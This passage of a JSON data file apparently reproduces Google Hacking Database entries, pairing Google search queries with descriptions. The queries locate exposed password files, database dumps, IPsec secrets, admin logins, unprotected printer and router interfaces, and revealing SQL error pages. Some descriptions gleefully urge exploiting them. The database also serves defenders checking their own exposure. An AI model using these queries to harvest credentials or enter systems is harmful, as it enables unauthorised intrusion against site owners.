        "textualDescription": "DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)"
    }, 
    {
        "signatureReferenceNumber": "49", 
        "link": "https://www.exploit-db.com/ghdb/49/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=inurl%3Aconfig%2Ephp+dbuname+dbpass", 
        "shortDescription": "inurl:config.php dbuname dbpass", 
        "textualDescription": "The old config.php script. This puppy should be held very closely. It should never be viewable to your web visitors because it contains CLEARTEXT usernames and passwords!The hishest of all googledorks ratings!"
    }, 
    {
        "signatureReferenceNumber": "50", 
        "link": "https://www.exploit-db.com/ghdb/50/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=inurl%3Atech%2Dsupport+inurl%3Ashow+Cisco", 
        "shortDescription": "inurl:tech-support inurl:show Cisco", 
        "textualDescription": "This is a way to find Cisco products with an open web interface. These are generally supposed to be user and password protected. Google finds ones that aren't. Be sure to use Google's cache if you have trouble connecting. Also, there are very few results (2 at the time of posting.)"
    }, 
    {
        "signatureReferenceNumber": "51", 
        "link": "https://www.exploit-db.com/ghdb/51/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=i%5Findex%2Eshtml+%22Ready%22", 
        "shortDescription": "index_i.shtml Ready (Xerox printers on the web!)", 
        "textualDescription": "These printers are not-only web-enabled, but their management interface somehow got crawled by google! These puppies should not be public! You can really muck with these printers. In some cases, going to the \"password.shtml\" page, you can even lock out the admins if a username and password has not already been set! Thanks to mephisteau@yahoo.co.uk for the idea =)"
    }, 
    {
        "signatureReferenceNumber": "52", 
        "link": "https://www.exploit-db.com/ghdb/52/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=aboutprinter.shtml&btnG=Google+Search", 
        "shortDescription": "aboutprinter.shtml (More Xerox printers on the web!)", 
        "textualDescription": "More Xerox printers on the web! Google found these printers. Should their management interface be open to the WHOLE INTERNET? I think not."
    }, 
    {
        "signatureReferenceNumber": "53", 
        "link": "https://www.exploit-db.com/ghdb/53/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=%22Chatologica+MetaSearch%22+%22stack+tracking%3A%22", 
        "shortDescription": "\"Chatologica MetaSearch\" \"stack tracking\"", 
        "textualDescription": "There is soo much crap in this error message... Apache version, CGI environment vars, path names, stack-freaking-dumps, process ID's, perl version, yadda yadda yadda..."
    }, 
    {
        "signatureReferenceNumber": "54", 
        "link": "https://www.exploit-db.com/ghdb/54/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=mystuff.xml+intitle:%22index+of%22", 
        "shortDescription": "mystuff.xml - Trillian data files", 
        "textualDescription": "This particular file contains web links that trillian users have entered into the tool. Trillian combines many different messaging programs into one tool. AIM, MSN, Yahoo, ICQ, IRC, etc. Although this particular file is fairly benign, check out the other files in the same directory. There is usually great stuff here!"
    }, 
    {
        "signatureReferenceNumber": "55", 
        "link": "https://www.exploit-db.com/ghdb/55/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22index+of%22+trillian.ini", 
        "shortDescription": "trillian.ini", 
        "textualDescription": "Trillian pulls together all sort of messaging clients like AIM MSN, Yahoo, IRC, ICQ, etc. The various ini files that trillian uses include files like aim.ini and msn.ini. These ini files contain encoded passwords, usernames, buddy lists, and all sorts of other fun things. Thanks for putting these on the web for us, googledorks!"
    }, 
    {
        "signatureReferenceNumber": "56", 
        "link": "https://www.exploit-db.com/ghdb/56/", 
        "category": "Footholds", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=intitle%3Aadmin+intitle%3Alogin", 
        "shortDescription": "intitle:admin intitle:login", 
        "textualDescription": "Admin Login pages. Now, the existance of this page does not necessarily mean a server is vulnerable, but it sure is handy to let Google do the discovering for you, no? Let's face it, if you're trying to hack into a web server, this is one of the more obvious places to poke."
    }, 
    {
        "signatureReferenceNumber": "57", 
        "link": "https://www.exploit-db.com/ghdb/57/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=%22ORA-00921%3A+unexpected+end+of+SQL+command%22", 
        "shortDescription": "ORA-00921: unexpected end of SQL command", 
        "textualDescription": "Another SQL error message from Cesar. This one coughs up full web pathnames and/or php filenames."
    }, 
    {
        "signatureReferenceNumber": "58", 
        "link": "https://www.exploit-db.com/ghdb/58/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=inurl%3Apasslist.txt", 
        "shortDescription": "passlist.txt (a better way)", 
        "textualDescription": "Cleartext passwords. No decryption required!"
    }, 
    {
        "signatureReferenceNumber": "59", 
        "link": "https://www.exploit-db.com/ghdb/59/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?q=inurl:sitebuildercontent&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=0&sa=N", 
        "shortDescription": "sitebuildercontent", 
        "textualDescription": "This is a default directory for the sitebuilder web design software program. If these people posted web pages with default sitebuilder sirectory names, I wonder what else they got wrong?"
    }, 
    {
        "signatureReferenceNumber": "60", 
        "link": "https://www.exploit-db.com/ghdb/60/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?q=inurl:sitebuilderfiles&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=0&sa=N", 
        "shortDescription": "sitebuilderfiles", 
        "textualDescription": "This is a default directory for the sitebuilder web design software program. If these people posted web pages with default sitebuilder sirectory names, I wonder what else they got wrong?"
    }, 
    {
        "signatureReferenceNumber": "61", 
        "link": "https://www.exploit-db.com/ghdb/61/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?q=inurl:sitebuilderpictures&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=0&sa=N", 
        "shortDescription": "sitebuilderpictures", 
        "textualDescription": "This is a default directory for the sitebuilder web design software program. If these people posted web pages with default sitebuilder sirectory names, I wonder what else they got wrong?"
    }, 
    {
        "signatureReferenceNumber": "62", 
        "link": "https://www.exploit-db.com/ghdb/62/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Ahtpasswd+htpasswd", 
        "shortDescription": "htpasswd", 
        "textualDescription": "This is a nifty way to find htpasswd files. Htpasswd files contain usernames and crackable passwords for web pages and directories. They're supposed to be server-side, not available to web clients! *duh*"
    }, 
    {
        "signatureReferenceNumber": "63", 
        "link": "https://www.exploit-db.com/ghdb/63/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22YaBB+SE+Dev+Team%22", 
        "shortDescription": "\"YaBB SE Dev Team\"", 
        "textualDescription": "Yet Another Bulletin Board (YABB) SE (versions 1.5.4 and 1.5.5 and perhaps others) contain an SQL injection vulnerability which may allow several attacks including unauthorized database modification or viewing. See http://www.securityfocus.com/bid/9674for more information. Also see http://www.securityfocus.com/bid/9677for information about an information leakage vulnerability in versions YaBB Gold - Sp 1.3.1 and others."
    }, 
    {
        "signatureReferenceNumber": "64", 
        "link": "https://www.exploit-db.com/ghdb/64/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3ACustva.asp+", 
        "shortDescription": "EarlyImpact Productcart", 
        "textualDescription": "The EarlyImpact Productcart contains multiple vulnerabilites, which could exploited to allow an attacker to steal user credentials or mount other attacks. See http://www.securityfocus.com/bid/9669 for more informationfor more information. Also see http://www.securityfocus.com/bid/9677for information about an information leakage vulnerability in versions YaBB Gold - Sp 1.3.1 and others."
    }, 
    {
        "signatureReferenceNumber": "65", 
        "link": "https://www.exploit-db.com/ghdb/65/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Powered+by+mnoGoSearch+-+free+web+search+engine+software%22", 
        "shortDescription": "mnGoSearch vulnerability", 
        "textualDescription": "According to http://www.securityfocus.com/bid/9667, certain versions of mnGoSearch contain a buffer overflow vulnerability which allow an attacker to execute commands on the server."
    }, 
    {
        "signatureReferenceNumber": "66", 
        "link": "https://www.exploit-db.com/ghdb/66/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?ie=UTF-8&oe=UTF-8&q=intitle%3A%22the+page+cannot+be+found%22+inetmgr", 
        "shortDescription": "IIS 4.0 error messages", 
        "textualDescription": "IIS 4.0 servers. Extrememly old, incredibly easy to hack..."
    }, 
    {
        "signatureReferenceNumber": "67", 
        "link": "https://www.exploit-db.com/ghdb/67/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?ie=UTF-8&oe=UTF-8&q=intitle%3A%22the+page+cannot+be+found%22+%222004+microsoft+corporation%22", 
        "shortDescription": "Windows 2000 web server error messages", 
        "textualDescription": "Windows 2000 web servers. Aging, fairly easy to hack, especially out of the box..."
    }, 
    {
        "signatureReferenceNumber": "68", 
        "link": "https://www.exploit-db.com/ghdb/68/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22the+page+cannot+be+found%22+%22internet+information+services%22", 
        "shortDescription": "IIS web server error messages", 
        "textualDescription": "This query finds various types of IIS servers. This error message is fairly indicative of a somewhat unmodified IIS server, meaning it may be easier to break into..."
    }, 
    {
        "signatureReferenceNumber": "69", 
        "link": "https://www.exploit-db.com/ghdb/69/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?&q=%22%23+phpMyAdmin+MySQL%2DDump%22+filetype%3Atxt", 
        "shortDescription": "phpMyAdmin dumps", 
        "textualDescription": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but don't leave your database dumps laying around on the web. They contain all SORTS of sensitive information..."
    }, 
    {
        "signatureReferenceNumber": "70", 
        "link": "https://www.exploit-db.com/ghdb/70/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=ISO-8859-1&safe=off&q=%22%23+phpMyAdmin+MySQL-Dump%22+%22INSERT+INTO%22+-%22the%22", 
        "shortDescription": "phpMyAdmin dumps", 
        "textualDescription": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but don't leave your database dumps laying around on the web. They contain all SORTS of sensitive information..."
    }, 
    {
        "signatureReferenceNumber": "71", 
        "link": "https://www.exploit-db.com/ghdb/71/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Gallery+in+Configuration+mode%22", 
        "shortDescription": "Gallery in configuration mode", 
        "textualDescription": "Gallery is a nice little php program that allows users to post personal pictures on their website. So handy, in fact, that I use it on my site! However, the Gallery configuration mode allows outsiders to make changes to your gallery. This is why you shouldn't leave your gallery in configuration mode. These people, unfortunately, have done just that!"
    }, 
    {
        "signatureReferenceNumber": "72", 
        "link": "https://www.exploit-db.com/ghdb/72/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex%2Eof+cgiirc%2Econfig%27", 
        "shortDescription": "cgiirc.conf", 
        "textualDescription": "CGIIRC is a web-based IRC client. Very cool stuff. The cgiirc.config file lists the options for this porgram, including the default sites that can be attached to, server passwords, and crypts of admin passwords. This file is for CGIIRC, not Google surfers!"
    }, 
    {
        "signatureReferenceNumber": "73", 
        "link": "https://www.exploit-db.com/ghdb/73/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3A%27cgiirc.config%27", 
        "shortDescription": "cgiirc.conf", 
        "textualDescription": "This is another less reliable way of finding the cgiirc.config file. CGIIRC is a web-based IRC client. Very cool stuff. The cgiirc.config file lists the options for this porgram, including the default sites that can be attached to, server passwords, and crypts of admin passwords. This file is for CGIIRC, not Google surfers!"
    }, 
    {
        "signatureReferenceNumber": "74", 
        "link": "https://www.exploit-db.com/ghdb/74/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aipsec.secrets+-history+-bugs", 
        "shortDescription": "ipsec.secrets", 
        "textualDescription": "from the manpage for ipsec_secrets: \"It is vital that these secrets be protected. The file should be owned by the super-user, and its permissions should be set to block all access by others.\" So let's make it plain: DO NOT SHOW THIS FILE TO ANYONE! Googledorks rejoice, these files are on the web!"
    }, 
    {
        "signatureReferenceNumber": "75", 
        "link": "https://www.exploit-db.com/ghdb/75/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aipsec.secrets+%22holds+shared+secrets%22", 
        "shortDescription": "ipsec.secrets", 
        "textualDescription": "from the manpage for ipsec_secrets: \"It is vital that these secrets be protected. The file should be owned by the super-user, and its permissions should be set to block all access by others.\" So let's make it plain: DO NOT SHOW THIS FILE TO ANYONE! Googledorks rejoice, these files are on the web!"
    }, 
    {
        "signatureReferenceNumber": "76", 
        "link": "https://www.exploit-db.com/ghdb/76/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aipsec.conf+-intitle%3Amanpage", 
        "shortDescription": "ipsec.conf", 
        "textualDescription": "The ipsec.conf file could help hackers figure out what uber-secure users of freeS/WAN are protecting...."
    }, 
    {
        "signatureReferenceNumber": "77", 
        "link": "https://www.exploit-db.com/ghdb/77/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22500+Internal+Server+Error%22+%22server+at%22", 
        "shortDescription": "Internal Server Error", 
        "textualDescription": "This one shows the type of web server running on the site, and has the ability to show other information depending on how the message is internally formatted."
    }, 
    {
        "signatureReferenceNumber": "78", 
        "link": "https://www.exploit-db.com/ghdb/78/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?q=%22mySQL+error+with+query%22", 
        "shortDescription": "mysql error with query", 
        "textualDescription": "Another error message, this appears when an SQL query bails. This is a generic mySQL message, so there's all sort of information hackers can use, depending on the actual error message..."
    }, 
    {
        "signatureReferenceNumber": "79", 
        "link": "https://www.exploit-db.com/ghdb/79/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=%22You+have+an+error+in+your+SQL+syntax+near%22", 
        "shortDescription": "sQL syntax error", 
        "textualDescription": "Another generic SQL message, this message can display path names and partial SQL code, both of which are very helpful for hackers..."
    }, 
    {
        "signatureReferenceNumber": "80", 
        "link": "https://www.exploit-db.com/ghdb/80/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?q=%22Supplied+argument+is+not+a+valid+MySQL+result+resource%22&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=90&sa=N", 
        "shortDescription": "\"Supplied argument is not a valid MySQL result resource\"", 
        "textualDescription": "Another generic SQL message, this message can display path names, function names, filenames and partial SQL code, all of which are very helpful for hackers..."
    }, 
    {
        "signatureReferenceNumber": "81", 
        "link": "https://www.exploit-db.com/ghdb/81/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=%22ORA%2D00936%3A+missing+expression%22", 
        "shortDescription": "ORA-00936: missing expression", 
        "textualDescription": "A generic ORACLE error message, this message can display path names, function names, filenames and partial database code, all of which are very helpful for hackers..."
    }, 
    {
        "signatureReferenceNumber": "82", 
        "link": "https://www.exploit-db.com/ghdb/82/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22ORA%2D00921%3A+unexpected+end+of+SQL+command%22", 
        "shortDescription": "ORA-00921: unexpected end of SQL command", 
        "textualDescription": "Another generic SQL message, this message can display path names, function names, filenames and partial SQL code, all of which are very helpful for hackers..."
    }, 
    {
        "signatureReferenceNumber": "83", 
        "link": "https://www.exploit-db.com/ghdb/83/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22ORA-00933%3A+SQL+command+not+properly+ended%22", 
        "shortDescription": "\"ORA-00933: SQL command not properly ended\"", 
        "textualDescription": "An Oracle error message, this message can display path names, function names, filenames and partial SQL code, all of which are very helpful for hackers..."
    }, 
    {
        "signatureReferenceNumber": "84", 
        "link": "https://www.exploit-db.com/ghdb/84/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?q=%22Unclosed+quotation+mark+before+the+character+string%22&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=10&sa=N", 
        "shortDescription": "\"Unclosed quotation mark before the character string\"", 
        "textualDescription": "An SQL Server error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."
    }, 
    {
        "signatureReferenceNumber": "85", 
        "link": "https://www.exploit-db.com/ghdb/85/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?q=%22Incorrect+syntax+near%22&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=90&sa=N", 
        "shortDescription": "\"Incorrect syntax near\"", 
        "textualDescription": "An SQL Server error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."
    }, 
    {
        "signatureReferenceNumber": "86", 
        "link": "https://www.exploit-db.com/ghdb/86/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Incorrect+syntax+near%22+-the", 
        "shortDescription": "\"Incorrect syntax near\"", 
        "textualDescription": "An SQL Server error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."
    }, 
    {
        "signatureReferenceNumber": "87", 
        "link": "https://www.exploit-db.com/ghdb/87/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22PostgreSQL+query+failed%3A++ERROR%3A++parser%3A+parse+error%22", 
        "shortDescription": "\"PostgreSQL query failed:  ERROR:  parser: parse error\"", 
        "textualDescription": "An PostgreSQL error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."
    }, 
    {
        "signatureReferenceNumber": "88", 
        "link": "https://www.exploit-db.com/ghdb/88/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Supplied+argument+is+not+a+valid+PostgreSQL+result%22", 
        "shortDescription": "supplied argument is not a valid PostgreSQL result", 
        "textualDescription": "An PostgreSQL error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."
    }, 
    {
        "signatureReferenceNumber": "89", 
        "link": "https://www.exploit-db.com/ghdb/89/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?q=%22Syntax+error+in+query+expression+%22+-the&hl=en&lr=&ie=UTF-8&oe=UTF-8", 
        "shortDescription": "\"Syntax error in query expression \" -the", 
        "textualDescription": "An Access error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."
    }, 
    {
        "signatureReferenceNumber": "90", 
        "link": "https://www.exploit-db.com/ghdb/90/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22An+illegal+character+has+been+found+in+the+statement%22+-%22previous+message%22", 
        "shortDescription": "\"An illegal character has been found in the statement\" -\"previous message\"", 
        "textualDescription": "An Informix error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."
    }, 
    {
        "signatureReferenceNumber": "91", 
        "link": "https://www.exploit-db.com/ghdb/91/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22A+syntax+error+has+occurred%22+filetype%3Aihtml", 
        "shortDescription": "\"A syntax error has occurred\" filetype:ihtml", 
        "textualDescription": "An Informix error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers"
    }, 
    {
        "signatureReferenceNumber": "92", 
        "link": "https://www.exploit-db.com/ghdb/92/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22detected+an+internal+error+%5BIBM%5D%5BCLI+Driver%5D%5BDB2%2F6000%5D%22", 
        "shortDescription": "\"detected an internal error [IBM][CLI Driver][DB2/6000]\"", 
        "textualDescription": "A DB2 error message, this message can display path names, function names, filenames, partial code and program state, all of which are very helpful for hackers..."
    }, 
    {
        "signatureReferenceNumber": "93", 
        "link": "https://www.exploit-db.com/ghdb/93/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=An+unexpected+token+%22END-OF-STATEMENT%22+was+found", 
        "shortDescription": "An unexpected token \"END-OF-STATEMENT\" was found", 
        "textualDescription": "A DB2 error message, this message can display path names, function names, filenames, partial code and program state, all of which are very helpful for hackers..."
    }, 
    {
        "signatureReferenceNumber": "94", 
        "link": "https://www.exploit-db.com/ghdb/94/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22statistics+of%22+%22advanced+web+statistics%22", 
        "shortDescription": "intitle:\"statistics of\" \"advanced web statistics\"", 
        "textualDescription": "the awstats program shows web statistics for web servers. This information includes who is visiting the site, what pages they visit, error codes produced, filetypes hosted on the server, number of hits, and more which can provide very interesting recon information for an attacker."
    }, 
    {
        "signatureReferenceNumber": "95", 
        "link": "https://www.exploit-db.com/ghdb/95/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Usage+Statistics+for%22+%22Generated+by+Webalizer%22", 
        "shortDescription": "intitle:\"Usage Statistics for\" \"Generated by Webalizer\"", 
        "textualDescription": "The webalizer program shows web statistics for web servers. This information includes who is visiting the site, what pages they visit, error codes produced, filetypes hosted on the server, number of hits, referrers, exit pages, and more which can provide very interesting recon information for an attacker."
    }, 
    {
        "signatureReferenceNumber": "96", 
        "link": "https://www.exploit-db.com/ghdb/96/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22robots%2Etxt%22+%2B+%22Disallow%3A%22+filetype%3Atxt", 
        "shortDescription": "\"robots.txt\" \"Disallow:\" filetype:txt", 
        "textualDescription": "The robots.txt file serves as a set of instructions for web crawlers. The \"disallow\" tag tells a web crawler where NOT to look, for whatever reason. Hackers will always go to those places first!"
    }, 
    {
        "signatureReferenceNumber": "97", 
        "link": "https://www.exploit-db.com/ghdb/97/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Warning%3A+pg_connect%28%29%3A+Unable+to+connect+to+PostgreSQL+server%3A+FATAL%22", 
        "shortDescription": "\"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL\"", 
        "textualDescription": "This search reveals Postgresql servers in yet another way then we had seen before. Path information appears in the error message and sometimes database names."
    }, 
    {
        "signatureReferenceNumber": "98", 
        "link": "https://www.exploit-db.com/ghdb/98/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=%22phpMyAdmin%22+%22running+on%22+inurl%3A%22main.php%22&btnG=Google+Search", 
        "shortDescription": "\"phpMyAdmin\" \"running on\" inurl:\"main.php\"", 
        "textualDescription": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and  system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!"
    }, 
    {
        "signatureReferenceNumber": "99", 
        "link": "https://www.exploit-db.com/ghdb/99/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=inurl%3Amain.php+phpMyAdmin", 
        "shortDescription": "inurl:main.php phpMyAdmin", 
        "textualDescription": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and  system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!"
    }, 
    {
        "signatureReferenceNumber": "100", 
        "link": "https://www.exploit-db.com/ghdb/100/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=inurl%3Amain.php+Welcome+to+phpMyAdmin", 
        "shortDescription": "inurl:main.php Welcome to phpMyAdmin", 
        "textualDescription": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and  system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!"
    }, 
    {
        "signatureReferenceNumber": "101", 
        "link": "https://www.exploit-db.com/ghdb/101/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=%22Warning%3A+Cannot+modify+header+information+%2D+headers+already+sent%22", 
        "shortDescription": "\"Warning: Cannot modify header information - headers already sent\"", 
        "textualDescription": "A PHP error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."
    }, 
    {
        "signatureReferenceNumber": "102", 
        "link": "https://www.exploit-db.com/ghdb/102/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=intitle:%22wbem%22+compaq+login+%22Compaq+Information+Technologies+Group%22&hl=en&lr=&c2coff=1&filter=0", 
        "shortDescription": "intitle:\"wbem\" compaq login \"Compaq Information Technologies Group\"", 
        "textualDescription": "These devices are running HP Insight Management Agents for Servers which \"provide device information for all managed subsystems. Alerts are generated by SNMP traps.\" The information on these pages include server addresses and other assorted SNMP information."
    }, 
    {
        "signatureReferenceNumber": "103", 
        "link": "https://www.exploit-db.com/ghdb/103/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?q=intitle:osCommerce+inurl:admin+intext:%22redistributable+under+the+GNU%22intext:%22Online+Catalog%22+-demo+-site:oscommerce.com", 
        "shortDescription": "intitle:osCommerce inurl:admin intext:\"redistributable under the GNU\"intext:\"Online Catalog\" -demo -site:oscommerce.com", 
        "textualDescription": "This is a decent way to explore the admin interface of osCommerce e-commerce sites. Depending on how bad the setup of the web store is, web surfers can even Google their way into customer details and order status, all from the Google cache."
    }, 
    {
        "signatureReferenceNumber": "104", 
        "link": "https://www.exploit-db.com/ghdb/104/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex%2Eof+%22Apache%22+%22server+at%22", 
        "shortDescription": "intitle:index.of \"Apache\" \"server at\"", 
        "textualDescription": "This is a very basic string found on directory listing pages which show the version of the Apache web server. Hackers can use this information to find vulnerable targets without querying the servers."
    }, 
    {
        "signatureReferenceNumber": "105", 
        "link": "https://www.exploit-db.com/ghdb/105/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22access+denied+for+user%22+%22using+password%22", 
        "shortDescription": "\"access denied for user\" \"using password\"", 
        "textualDescription": "Another SQL error message, this message can display the username, database, path names and partial SQL code, all of which are very helpful for hackers..."
    }, 
    {
        "signatureReferenceNumber": "106", 
        "link": "https://www.exploit-db.com/ghdb/106/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Under+construction%22+%22does+not+currently+have%22", 
        "shortDescription": "intitle:\"Under construction\" \"does not currently have\"", 
        "textualDescription": "This error message can be used to narrow down the operating system and web server version which can be used by hackers to mount a specific attack."
    }, 
    {
        "signatureReferenceNumber": "107", 
        "link": "https://www.exploit-db.com/ghdb/107/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22seeing+this+instead%22+intitle%3A%22test+page+for+apache%22", 
        "shortDescription": "\"seeing this instead\" intitle:\"test page for apache\"", 
        "textualDescription": "This is the default web page for Apache 1.3.11 - 1.3.26. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained."
    }, 
    {
        "signatureReferenceNumber": "108", 
        "link": "https://www.exploit-db.com/ghdb/108/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Test+Page+for+Apache%22+%22It+Worked%21%22", 
        "shortDescription": "intitle:\"Test Page for Apache\" \"It Worked!\"", 
        "textualDescription": "This is the default web page for Apache 1.2.6 - 1.3.9. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained."
    }, 
    {
        "signatureReferenceNumber": "109", 
